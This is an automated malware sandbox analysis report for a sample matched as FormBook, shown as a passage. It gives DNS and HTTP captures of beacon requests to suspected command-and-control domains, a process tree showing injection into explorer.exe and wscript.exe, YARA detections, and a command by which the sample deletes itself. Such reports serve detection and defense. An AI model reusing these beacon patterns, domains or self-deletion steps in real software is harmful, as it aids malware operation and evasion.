Oct 7, 2021 12:48:48.167783022 CEST	80	49830	62.233.121.61	192.168.2.3
Oct 7, 2021 12:48:48.167882919 CEST	80	49830	62.233.121.61	192.168.2.3
Oct 7, 2021 12:48:48.167917967 CEST	49830	80	192.168.2.3	62.233.121.61
Oct 7, 2021 12:48:48.167926073 CEST	80	49830	62.233.121.61	192.168.2.3
Oct 7, 2021 12:48:48.167954922 CEST	80	49830	62.233.121.61	192.168.2.3
Oct 7, 2021 12:48:48.168055058 CEST	49830	80	192.168.2.3	62.233.121.61
Oct 7, 2021 12:48:48.168081999 CEST	49830	80	192.168.2.3	62.233.121.61
Oct 7, 2021 12:48:48.168087006 CEST	49830	80	192.168.2.3	62.233.121.61
Oct 7, 2021 12:48:48.205722094 CEST	80	49830	62.233.121.61	192.168.2.3
Oct 7, 2021 12:48:53.350774050 CEST	49838	80	192.168.2.3	142.111.24.2
Oct 7, 2021 12:48:53.517386913 CEST	80	49838	142.111.24.2	192.168.2.3
Oct 7, 2021 12:48:53.517543077 CEST	49838	80	192.168.2.3	142.111.24.2
Oct 7, 2021 12:48:53.517745972 CEST	49838	80	192.168.2.3	142.111.24.2
Oct 7, 2021 12:48:53.688707113 CEST	80	49838	142.111.24.2	192.168.2.3
Oct 7, 2021 12:48:53.688744068 CEST	80	49838	142.111.24.2	192.168.2.3
Oct 7, 2021 12:48:53.689071894 CEST	49838	80	192.168.2.3	142.111.24.2
Oct 7, 2021 12:48:53.689133883 CEST	49838	80	192.168.2.3	142.111.24.2
Oct 7, 2021 12:48:53.855370045 CEST	80	49838	142.111.24.2	192.168.2.3
Oct 7, 2021 12:48:58.725518942 CEST	49839	80	192.168.2.3	46.38.243.234
Oct 7, 2021 12:48:58.748789072 CEST	80	49839	46.38.243.234	192.168.2.3
Oct 7, 2021 12:48:58.748976946 CEST	49839	80	192.168.2.3	46.38.243.234
Oct 7, 2021 12:48:58.749258995 CEST	49839	80	192.168.2.3	46.38.243.234
Oct 7, 2021 12:48:58.779514074 CEST	80	49839	46.38.243.234	192.168.2.3
Oct 7, 2021 12:48:58.779541016 CEST	80	49839	46.38.243.234	192.168.2.3
Oct 7, 2021 12:48:58.779556036 CEST	80	49839	46.38.243.234	192.168.2.3
Oct 7, 2021 12:48:58.780591965 CEST	49839	80	192.168.2.3	46.38.243.234
Oct 7, 2021 12:48:58.780643940 CEST	49839	80	192.168.2.3	46.38.243.234
Oct 7, 2021 12:48:58.805063963 CEST	80	49839	46.38.243.234	192.168.2.3

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 7, 2021 12:48:48.019881964 CEST	57106	53	192.168.2.3	8.8.8.8
Oct 7, 2021 12:48:48.085918903 CEST	53	57106	8.8.8.8	192.168.2.3
Oct 7, 2021 12:48:53.173729897 CEST	60982	53	192.168.2.3	8.8.8.8
Oct 7, 2021 12:48:53.347812891 CEST	53	60982	8.8.8.8	192.168.2.3
Oct 7, 2021 12:48:58.703397036 CEST	58058	53	192.168.2.3	8.8.8.8
Oct 7, 2021 12:48:58.724622011 CEST	53	58058	8.8.8.8	192.168.2.3
Oct 7, 2021 12:49:03.824668884 CEST	64367	53	192.168.2.3	8.8.8.8
Oct 7, 2021 12:49:03.858380079 CEST	53	64367	8.8.8.8	192.168.2.3
Oct 7, 2021 12:49:08.875149012 CEST	51539	53	192.168.2.3	8.8.8.8
Oct 7, 2021 12:49:09.041867971 CEST	53	51539	8.8.8.8	192.168.2.3

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Oct 7, 2021 12:48:48.019881964 CEST	192.168.2.3	8.8.8.8	0x47a3	Standard query (0)	www.flex-aportelabels.com	A (IP address)	IN (0x0001)
Oct 7, 2021 12:48:53.173729897 CEST	192.168.2.3	8.8.8.8	0xc474	Standard query (0)	www.repsychel.com	A (IP address)	IN (0x0001)
Oct 7, 2021 12:48:58.703397036 CEST	192.168.2.3	8.8.8.8	0x8655	Standard query (0)	www.qumpan.com	A (IP address)	IN (0x0001)
Oct 7, 2021 12:49:03.824668884 CEST	192.168.2.3	8.8.8.8	0x9b18	Standard query (0)	www.christasconezntreats.com	A (IP address)	IN (0x0001)
Oct 7, 2021 12:49:08.875149012 CEST	192.168.2.3	8.8.8.8	0xaaea	Standard query (0)	www.lakearrowheadescape.com	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
Oct 7, 2021 12:48:48.085918903 CEST	8.8.8.8	192.168.2.3	0x47a3	No error (0)	www.flex-aportelabels.com		62.233.121.61	A (IP address)	IN (0x0001)
Oct 7, 2021 12:48:53.347812891 CEST	8.8.8.8	192.168.2.3	0xc474	No error (0)	www.repsychel.com		142.111.24.2	A (IP address)	IN (0x0001)
Oct 7, 2021 12:48:58.724622011 CEST	8.8.8.8	192.168.2.3	0x8655	No error (0)	www.qumpan.com		46.38.243.234	A (IP address)	IN (0x0001)
Oct 7, 2021 12:49:03.858380079 CEST	8.8.8.8	192.168.2.3	0x9b18	Name error (3)	www.christasconezntreats.com	none	none	A (IP address)	IN (0x0001)
Oct 7, 2021 12:49:09.041867971 CEST	8.8.8.8	192.168.2.3	0xaaea	No error (0)	www.lakearrowheadescape.com		156.240.151.179	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

www.flex-aportelabels.com

www.repsychel.com

www.qumpan.com

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.3	49830	62.233.121.61	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Oct 7, 2021 12:48:48.129311085 CEST	6502	OUT	GET /shjn/?UTqtRv=M2Xo1sk/PcdvYlySg++E/1rcNB0ZJYFL6a/vKXHyKrNsPeuk4b/zAJjzao2c5vk7I5lO&Whc=0DHdArEp5hQd HTTP/1.1 Host: www.flex-aportelabels.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Oct 7, 2021 12:48:48.167762995 CEST	6504	IN	HTTP/1.1 404 Not Found Date: Thu, 07 Oct 2021 10:48:48 GMT Server: Apache Last-Modified: Thu, 29 Oct 2020 17:44:48 GMT ETag: "82a1a-f65-5b2d2d61e36a7" Accept-Ranges: bytes Content-Length: 3941 X-Frame-Options: DENY Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 20 20 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 68 74 6d 6c 2c 20 62 6f 64 79 2c 20 23 70 61 72 74 6e 65 72 2c 20 69 66 72 61 6d 65 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 31 30 30 25 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3a 31 30 30 25 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 30 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 30 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 72 64 65 72 3a 30 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6f 75 74 6c 69 6e 65 3a 30 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 30 30 25 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 62 61 73 65 6c 69 6e 65 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 38 36 39 32 63 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 41 72 69 61 6c 2c 20 22 4c 75 63 69 64 61 20 53 61 6e 73 20 55 6e 69 63 6f 64 65 22 2c 22 4c 75 63 69 64 61 20 47 72 61 6e 64 65 22 2c 47 61 72 75 64 61 2c 73 61 6e 73 2d 73 65 72 69 66 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 09 6f 76 65 72 66 6c 6f 77 3a 20 68 69 64 64 65 6e 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 69 66 72 61 6d 65 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 09 6d 61 72 67 69 6e 3a 20 30 20 61 75 74 6f 20 30 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0d 0a 09 09 09 61 20 7b 0d 0a 09 09 09 20 20 20 20 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 6e 6f 6e 65 3b 0d 0a 09 09 09 7d 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 2e 77 72 61 70 70 65 72 20 7b 0d 0a 09 09 09 20 20 20 20 6d 61 78 2d 77 69 64 74 68 3a 20 31 31 30 30 70 78 3b 0d 0a 09 09 09 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 20 31 65 6d 3b 0d 0a 09 09 09 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 20 61 75 74 6f 3b 0d 0a 09 09 09 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 72 65 6c 61 74 69 76 65 3b 0d 0a 09 09 09 7d 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 2e 77 72 61 70 70 65 72 20 2e 6c 6f 67 6f 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 09 66 6c 6f 61 74 3a 20 6c 65 66 74 3b 0d 0a 09 09 09 7d 0d 0a 09 09 09 2e 77 72 61 70 70 65 72 20 2e 6c 6f 67 6f 20 69 6d 67 20 7b 0d 0a 20 20 20 20 20 20 Data Ascii: <!DOCTYPE html><html> <head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <style type="text/css"> html, body, #partner, iframe { height:100%; width:100%; margin:0; padding:0; border:0; outline:0; font-size:100%; vertical-align:baseline; background:#f8692c; color: #fff; font-family: Arial, "Lucida Sans Unicode","Lucida Grande",Garuda,sans-serif; } body { overflow: hidden; } iframe { margin: 0 auto 0; }a { text-decoration: none;} .wrapper { max-width: 1100px; padding: 0 1em; margin: 0 auto; position: relative;} .wrapper .logo { float: left;}.wrapper .logo img {
Oct 7, 2021 12:48:48.167783022 CEST	6505	IN	Data Raw: 20 20 20 20 20 20 09 77 69 64 74 68 3a 20 35 30 76 77 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 09 6d 61 78 2d 77 69 64 74 68 3a 20 32 34 30 70 78 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 09 6d 61 72 67 69 6e 3a 20 31 65 6d 20 30 3b 0d 0a Data Ascii: width: 50vw; max-width: 240px; margin: 1em 0;}.wrapper .nav {text-align: right;display: inline;float: right;margin: 1.6em 0;}.wrapper .nav a {display: inline-
Oct 7, 2021 12:48:48.167882919 CEST	6507	IN	Data Raw: 74 65 6e 74 3d 22 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 2c 20 61 6c 6c 22 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 21 2d 2d 20 46 6f 6c 6c 6f 77 69 6e 67 20 4d 65 74 61 2d 54 61 67 20 66 69 78 65 73 20 73 63 Data Ascii: tent="index, follow, all" name="robots"> ... Following Meta-Tag fixes scaling-issues on mobile devices --> <meta content="width=device-width; initial-scale=1.0; maximum-scale=1.0; user-scalable=0;" name="viewport"> </he
Oct 7, 2021 12:48:48.167926073 CEST	6507	IN	Data Raw: 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 6f 73 74 20 2b 20 27 2f 27 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 2b 20 27 65 61 73 79 70 61 72 6b 65 64 64 6f 6d 61 69 6e 73 27 0d 0a 20 20 20 20 20 20 20 20 Data Ascii: w.location.host + '/' + 'easyparkeddomains' + '/park.js">' + '<\/script>' ); </script> </body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.3	49838	142.111.24.2	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Oct 7, 2021 12:48:53.517745972 CEST	6532	OUT	GET /shjn/?UTqtRv=Bck6v8Q7O88rutfkCywFCzEhcupnZwvilAlKH6TNYdqDwzSjrXWf51hg8vLZW/hTgHNK&Whc=0DHdArEp5hQd HTTP/1.1 Host: www.repsychel.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Oct 7, 2021 12:48:53.688707113 CEST	6533	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 07 Oct 2021 10:48:53 GMT Content-Type: text/html Content-Length: 789 Connection: close Data Raw: 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e bb b4 b0 b2 ce bd b6 cb bd a8 d6 fe b2 c4 c1 cf bc af cd c5 d3 d0 cf de b9 ab cb be 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 67 62 32 33 31 32 22 20 2f 3e 0d 0a 3c 73 63 72 69 70 74 3e 0d 0a 28 66 75 6e 63 74 69 6f 6e 28 29 7b 0d 0a 20 20 20 20 76 61 72 20 62 70 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 27 73 63 72 69 70 74 27 29 3b 0d 0a 20 20 20 20 76 61 72 20 63 75 72 50 72 6f 74 6f 63 6f 6c 20 3d 20 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 70 72 6f 74 6f 63 6f 6c 2e 73 70 6c 69 74 28 27 3a 27 29 5b 30 5d 3b 0d 0a 20 20 20 20 69 66 20 28 63 75 72 50 72 6f 74 6f 63 6f 6c 20 3d 3d 3d 20 27 68 74 74 70 73 27 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 62 70 2e 73 72 63 20 3d 20 27 68 74 74 70 73 3a 2f 2f 7a 7a 2e 62 64 73 74 61 74 69 63 2e 63 6f 6d 2f 6c 69 6e 6b 73 75 62 6d 69 74 2f 70 75 73 68 2e 6a 73 27 3b 0d 0a 20 20 20 20 7d 0d 0a 20 20 20 20 65 6c 73 65 20 7b 0d 0a 20 20 20 20 20 20 20 20 62 70 2e 73 72 63 20 3d 20 27 68 74 74 70 3a 2f 2f 70 75 73 68 2e 7a 68 61 6e 7a 68 61 6e 67 2e 62 61 69 64 75 2e 63 6f 6d 2f 70 75 73 68 2e 6a 73 27 3b 0d 0a 20 20 20 20 7d 0d 0a 20 20 20 20 76 61 72 20 73 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 22 73 63 72 69 70 74 22 29 5b 30 5d 3b 0d 0a 20 20 20 20 73 2e 70 61 72 65 6e 74 4e 6f 64 65 2e 69 6e 73 65 72 74 42 65 66 6f 72 65 28 62 70 2c 20 73 29 3b 0d 0a 7d 29 28 29 3b 0d 0a 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 2f 63 6f 6d 6d 6f 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 2f 74 6a 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html xmlns="http://www.w3.org/1999/xhtml"><head><title></title><meta http-equiv="Content-Type" content="text/html; charset=gb2312" /><script>(function(){ var bp = document.createElement('script'); var curProtocol = window.location.protocol.split(':')[0]; if (curProtocol === 'https') { bp.src = 'https://zz.bdstatic.com/linksubmit/push.js'; } else { bp.src = 'http://push.zhanzhang.baidu.com/push.js'; } var s = document.getElementsByTagName("script")[0]; s.parentNode.insertBefore(bp, s);})();</script></head><script language="javascript" type="text/javascript" src="/common.js"></script><script language="javascript" type="text/javascript" src="/tj.js"></script></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
2	192.168.2.3	49839	46.38.243.234	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Oct 7, 2021 12:48:58.749258995 CEST	6534	OUT	GET /shjn/?UTqtRv=yig434buSM9mjL6sFft/wR3J8yL+W/NNnR041iD/jBfLeA0894Dqi/iq5ABbTrmmBq9f&Whc=0DHdArEp5hQd HTTP/1.1 Host: www.qumpan.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Oct 7, 2021 12:48:58.779541016 CEST	6534	IN	HTTP/1.1 404 Not Found Date: Thu, 07 Oct 2021 10:47:53 GMT Server: Apache/2.4.10 (Debian) Content-Length: 276 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 31 30 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 71 75 6d 70 61 6e 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.10 (Debian) Server at www.qumpan.com Port 80</address></body></html>

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: 9LjOeq9jnl.exe PID: 244 Parent PID: 5480

General

Start time:	12:46:58
Start date:	07/10/2021
Path:	C:\Users\user\Desktop\9LjOeq9jnl.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\Desktop\9LjOeq9jnl.exe'
Imagebase:	0x9b0000
File size:	642048 bytes
MD5 hash:	CA7B5F2EC232FADEFA0AF01AE3CBA9BE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.305266338.0000000002E42000.00000004.00000001.sdmp, Author: Joe Security
Reputation:	low

Chronological Activities

Analysis Process: 9LjOeq9jnl.exe PID: 4352 Parent PID: 244

General

Start time:	12:47:02
Start date:	07/10/2021
Path:	C:\Users\user\Desktop\9LjOeq9jnl.exe
Wow64 process (32bit):	false
Commandline:	C:\Users\user\Desktop\9LjOeq9jnl.exe
Imagebase:	0x1a0000
File size:	642048 bytes
MD5 hash:	CA7B5F2EC232FADEFA0AF01AE3CBA9BE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low

Chronological Activities

Analysis Process: 9LjOeq9jnl.exe PID: 4348 Parent PID: 244

General

Start time:	12:47:02
Start date:	07/10/2021
Path:	C:\Users\user\Desktop\9LjOeq9jnl.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\Desktop\9LjOeq9jnl.exe
Imagebase:	0x660000
File size:	642048 bytes
MD5 hash:	CA7B5F2EC232FADEFA0AF01AE3CBA9BE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.343140057.0000000003A59000.00000004.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.343140057.0000000003A59000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.343140057.0000000003A59000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000002.00000002.341688942.0000000002A51000.00000004.00000001.sdmp, Author: Joe Security
Reputation:	low

Chronological Activities

Analysis Process: 9LjOeq9jnl.exe PID: 6936 Parent PID: 4348

General

Start time:	12:47:20
Start date:	07/10/2021
Path:	C:\Users\user\Desktop\9LjOeq9jnl.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\Desktop\9LjOeq9jnl.exe
Imagebase:	0x890000
File size:	642048 bytes
MD5 hash:	CA7B5F2EC232FADEFA0AF01AE3CBA9BE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.436667647.0000000000E90000.00000040.00020000.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.436667647.0000000000E90000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.436667647.0000000000E90000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.436271319.0000000000400000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.436271319.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.436271319.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.436706282.0000000000ED0000.00000040.00020000.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.436706282.0000000000ED0000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.436706282.0000000000ED0000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	low

Chronological Activities

Analysis Process: explorer.exe PID: 3352 Parent PID: 6936

General

Start time:	12:47:21
Start date:	07/10/2021
Path:	C:\Windows\explorer.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Explorer.EXE
Imagebase:	0x7ff720ea0000
File size:	3933184 bytes
MD5 hash:	AD5296B280E8F522A8A897C96BAB0E1D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000000.396784808.0000000007957000.00000040.00020000.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000000.396784808.0000000007957000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000000.396784808.0000000007957000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000000.378629628.0000000007957000.00000040.00020000.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000000.378629628.0000000007957000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000000.378629628.0000000007957000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	high

Chronological Activities

Analysis Process: autofmt.exe PID: 4344 Parent PID: 3352

General

Start time:	12:47:50
Start date:	07/10/2021
Path:	C:\Windows\SysWOW64\autofmt.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\SysWOW64\autofmt.exe
Imagebase:	0xba0000
File size:	831488 bytes
MD5 hash:	7FC345F685C2A58283872D851316ACC4
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	moderate

Chronological Activities

Analysis Process: wscript.exe PID: 3576 Parent PID: 6936

General

Start time:	12:48:03
Start date:	07/10/2021
Path:	C:\Windows\SysWOW64\wscript.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\wscript.exe
Imagebase:	0x13c0000
File size:	147456 bytes
MD5 hash:	7075DD7B9BE8807FCA93ACD86F724884
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000011.00000002.561977714.0000000000990000.00000040.00020000.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000011.00000002.561977714.0000000000990000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000011.00000002.561977714.0000000000990000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000011.00000002.562536876.0000000001350000.00000004.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000011.00000002.562536876.0000000001350000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000011.00000002.562536876.0000000001350000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000011.00000002.562301653.0000000001010000.00000040.00020000.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000011.00000002.562301653.0000000001010000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000011.00000002.562301653.0000000001010000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	high

Chronological Activities

Analysis Process: cmd.exe PID: 6164 Parent PID: 3576

General

Start time:	12:48:06
Start date:	07/10/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	/c del 'C:\Users\user\Desktop\9LjOeq9jnl.exe'
Imagebase:	0xd80000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: conhost.exe PID: 6912 Parent PID: 6164

General

Start time:	12:48:07
Start date:	07/10/2021
Path:	C:\Windows\System32\conhost.exe
